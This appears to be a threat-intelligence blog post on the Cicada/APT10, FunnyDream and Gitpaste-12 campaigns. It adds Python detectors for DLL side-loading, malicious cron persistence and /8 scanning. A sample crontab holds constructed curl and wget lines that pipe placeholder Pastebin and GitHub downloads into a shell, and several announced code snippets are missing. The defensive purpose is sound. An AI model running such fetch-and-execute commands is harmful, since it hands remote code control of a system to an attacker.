Cicada 🐞 Chinese sponsored

The hackers, most likely from a well-known group funded by the Chinese government, are outfitted with both off-the-shelf and custom-made tools. One such tool exploits Zerologon, a vulnerability that can give attackers instant administrator privileges on vulnerable systems. Cicada is widely believed to be funded by the Chinese government and also goes by the monikers APT10 and Stone Panda.

Japan-linked organizations need to be on alert as it is clear they are a key target of this sophisticated and well-resourced group, with the automotive industry seemingly a key target in this attack campaign.

The attacks make extensive use of DLL side-loading, a technique that occurs when attackers replace a legitimate Windows dynamic-link library file with a malicious one. Attackers use DLL side-loading to inject malware into legitimate processes so they can keep the hack from being detected by security software.
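As an added defensive illustration (not code from the original report), the following Python check models the side-loading pattern described above: it takes a constructed inventory of one application directory, as a signature-checking tool would report it, and flags DLLs that are unsigned, signed by a different publisher than the EXE beside them, or whose hash is not in the vendor's known-good set. All paths, signer names and hashes are placeholders.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class FileInfo:
    path: str              # directory + file name, Windows-style
    signer: Optional[str]  # Authenticode signer subject, None if unsigned
    sha256: str            # hex digest (constructed placeholders below)

# Constructed inventory of one application directory, in the shape a
# sigcheck-style tool would give it. Hashes and signers are placeholders.
SAMPLE_INVENTORY = [
    FileInfo(r"C:\Program Files\VendorApp\app.exe", "Vendor Software Ltd", "aa" * 32),
    FileInfo(r"C:\Program Files\VendorApp\vendorlib.dll", "Vendor Software Ltd", "bb" * 32),
    FileInfo(r"C:\Program Files\VendorApp\version.dll", None, "cc" * 32),
    FileInfo(r"C:\Program Files\VendorApp\helper.dll", "Unrelated Publisher", "dd" * 32),
]

# Vendor-published hashes of the DLLs shipped with app.exe (constructed).
KNOWN_GOOD = {"bb" * 32}

def side_load_candidates(inventory, known_good):
    """Flag DLLs sitting beside a signed EXE that are unsigned, signed by a
    different publisher than that EXE, or not in the vendor's known-good set.
    Returns a list of (path, reasons)."""
    by_dir = {}
    for f in inventory:
        d, name = f.path.rsplit("\\", 1)
        by_dir.setdefault(d, []).append((name.lower(), f))
    findings = []
    for d, entries in by_dir.items():
        exe_signers = {f.signer for n, f in entries if n.endswith(".exe") and f.signer}
        if not exe_signers:
            continue  # no signed EXE here, nothing to compare against
        for name, f in entries:
            if not name.endswith(".dll"):
                continue
            reasons = []
            if f.signer is None:
                reasons.append("unsigned DLL next to signed EXE")
            elif f.signer not in exe_signers:
                reasons.append(f"signer '{f.signer}' differs from EXE signer")
            if f.sha256 not in known_good:
                reasons.append("hash not in vendor known-good set")
            if reasons:
                findings.append((f.path, reasons))
    return findings
```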

Microsoft patched the critical privilege-escalation vulnerability in August, but since then attackers have been using it to compromise organizations that have yet to install the update.

Threat Vector

Third-stage DLL has an export named “FuckYouAnti”

Third-stage DLL uses CppHostCLR technique to inject and execute the .NET loader assembly

.NET Loader is obfuscated with ConfuserEx v1.0.0

Final payload is QuasarRAT—an open source backdoor used by Cicada in the past

It’s difficult to say how, when, or where you will get attacked and compromised across geographies… Stay safe and secure.

FunnyDream APT targets Asian countries

A new Chinese state-sponsored hacking group (also known as an APT) has infected more than 200 systems across Southeast Asia with malware over the past two years. The group appears to be primarily interested in cyber-espionage, concentrating on stealing sensitive documents from infected hosts, with a special focus on national security and industrial espionage.

The malware infections are part of a widespread cyber-espionage campaign carried out by a group named FunnyDream, with targets in Malaysia, Taiwan, and the Philippines, and with most victims located in Vietnam.

The payloads consist of three malware strains: Chinoxy, PCShare, and FunnyDream.

Each of the three malware strains has a precise role. Chinoxy was deployed as the initial malware, acting as a simple backdoor for initial access.

PCShare, a known Chinese open-source remote access trojan, was deployed via Chinoxy and was used for exploring infected hosts.

FunnyDream, deployed with the help of PCShare, was the most potent and feature-rich of the three; it had more advanced persistence and communication capabilities and was used for data gathering and exfiltration.

[Figure: FunnyDream tool usage timeline (funnydream-timeline-tools.png)]

“Even looking at the tool usage timeline we can see that threat actors started by deploying a series of tools meant for quick and covert data exploration and exfiltration, and later decided to bring on a full toolkit, specifically the FunnyDream toolkit, for prolonged surveillance capabilities.” The actors also made use of living-off-the-land tools.

Gitpaste-12 Wormable bots 🐛🦠

GITY Worm

Gitpaste-12 is a recently discovered worm that uses GitHub and Pastebin to host its component code and has at least 12 different attack modules, giving it multiple ways to compromise a system.

The GitHub repository used at the time of discovery was as follows:

https://github[.]com/cnmnmsl-001/-

Gitpaste-12 Core

The first phase of the attack is the initial system compromise. This worm has 12 known attack modules, with more under development. The worm will attempt to use known exploits to compromise systems and may also attempt to brute-force passwords.

Once it has compromised a system, the malware sets up a cron job downloaded from Pastebin, which in turn fetches the same script and executes it again every minute. This is presumably one mechanism by which updates to the cron jobs can be pushed to the botnet.

The main shell script uploaded to the victim machine during the attack starts downloading and executing the other components of Gitpaste-12. First, it downloads and sets up a cron job, which periodically downloads and executes a script from Pastebin:

Next, it downloads from GitHub (https://raw.githubusercontent[.]com/cnmnmsl-001/-/master/shadu1) and executes it.
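As an added example (not part of the original write-up), a Python scan over a constructed crontab that flags the persistence pattern just described: an entry that fetches code from Pastebin or raw GitHub, pipes it into a shell, and fires every minute. The URLs in the sample are placeholders, not the campaign's real indicators.

```python
import re

# Constructed sample crontab (not content from the Gitpaste-12 report).
# The Pastebin and GitHub URLs are placeholders, not real indicators.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh
* * * * * curl -s https://pastebin.com/raw/PLACEHOLDER | sh
* * * * * wget -q -O- https://raw.githubusercontent.com/example-org/-/master/PLACEHOLDER | bash
"""

PASTE_HOSTS = {"pastebin.com", "raw.githubusercontent.com"}
# a curl/wget invocation and the host of the first URL it fetches
FETCH_RE = re.compile(r"\b(curl|wget)\b[^|;]*https?://([^/\s]+)")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(ba)?sh\b")

def every_minute(schedule):
    """True when all five cron fields are '*', i.e. the job fires each minute."""
    return schedule == ["*"] * 5

def scan_crontab(text):
    """Return (line, reasons) for entries that look like the fetch-and-execute
    persistence the worm installs."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)          # 5 schedule fields + command
        if len(parts) < 6:
            continue
        schedule, command = parts[:5], parts[5]
        reasons = []
        m = FETCH_RE.search(command)
        if m and m.group(2).lower() in PASTE_HOSTS:
            reasons.append(f"fetches code from {m.group(2)}")
        if PIPE_TO_SHELL_RE.search(command):
            reasons.append("pipes the download straight into a shell")
        if reasons and every_minute(schedule):
            reasons.append("runs every minute")
        if reasons:
            findings.append((line, reasons))
    return findings

if __name__ == "__main__":
    for line, reasons in scan_crontab(SAMPLE_CRONTAB):
        print(f"{line}\n    -> {'; '.join(reasons)}")
```

On a live host the same function can be fed the output of `crontab -l` for each user and the contents of /etc/cron.d.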

The malware begins by preparing the environment. This means stripping the system of its defenses, including firewall rules, SELinux, AppArmor, and common attack-prevention and monitoring software.

The shadu1 script contains comments in Chinese and offers attackers multiple commands for disabling different security capabilities:

Another capability is the ability to run a Monero cryptocurrency miner.

Worming Spread

The Gitpaste-12 malware also contains a script that launches attacks against other machines in an attempt to replicate and spread. It chooses a random /8 CIDR block to attack and tries every address within that range, as demonstrated by this call:

Another version of the script also opens ports 30004 and 30005 for reverse shell commands:
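An added detection example, not from the original post, run over constructed connection records: it flags a source that contacted many distinct hosts inside a single /8 (the sweep pattern the spreading script produces) and any connection to the two reverse-shell ports named above. The threshold of 100 targets is an assumed tuning value.

```python
import ipaddress
from collections import defaultdict

# Constructed connection-log records (src_ip, dst_ip, dst_port); not data
# from the Gitpaste-12 report. 10.0.0.7 plays the infected host sweeping a /8.
SAMPLE_CONNECTIONS = [
    ("10.0.0.5", "10.0.0.9", 443),
    ("10.0.0.5", "10.0.0.10", 22),
    ("10.0.0.6", "10.0.0.7", 30004),
] + [
    ("10.0.0.7", f"11.{i % 256}.{(i * 7) % 256}.{(i * 13) % 256}", 22)
    for i in range(250)
]

REVERSE_SHELL_PORTS = {30004, 30005}   # ports named in the write-up above

def slash8(ip):
    """Return the /8 block an address falls in, e.g. '11.0.0.0/8'."""
    return str(ipaddress.ip_network(f"{ip}/8", strict=False))

def find_sweepers(conns, min_targets=100):
    """Sources that contacted at least min_targets distinct hosts in one /8,
    the footprint of a script walking a whole /8 block."""
    targets = defaultdict(set)
    for src, dst, _port in conns:
        targets[(src, slash8(dst))].add(dst)
    return sorted((src, block, len(hosts))
                  for (src, block), hosts in targets.items()
                  if len(hosts) >= min_targets)

def find_reverse_shell_connections(conns, ports=REVERSE_SHELL_PORTS):
    """Connections to the ports the script opens for reverse shell commands."""
    return sorted({(src, dst, port) for src, dst, port in conns if port in ports})

if __name__ == "__main__":
    for src, block, n in find_sweepers(SAMPLE_CONNECTIONS):
        print(f"{src} contacted {n} distinct hosts in {block}")
    for src, dst, port in find_reverse_shell_connections(SAMPLE_CONNECTIONS):
        print(f"{src} -> {dst}:{port} (reverse shell port)")
```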

Final thought

No malware is good to have, but worms are particularly annoying. Their ability to spread in an automated fashion can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in a poor reputation for your organization.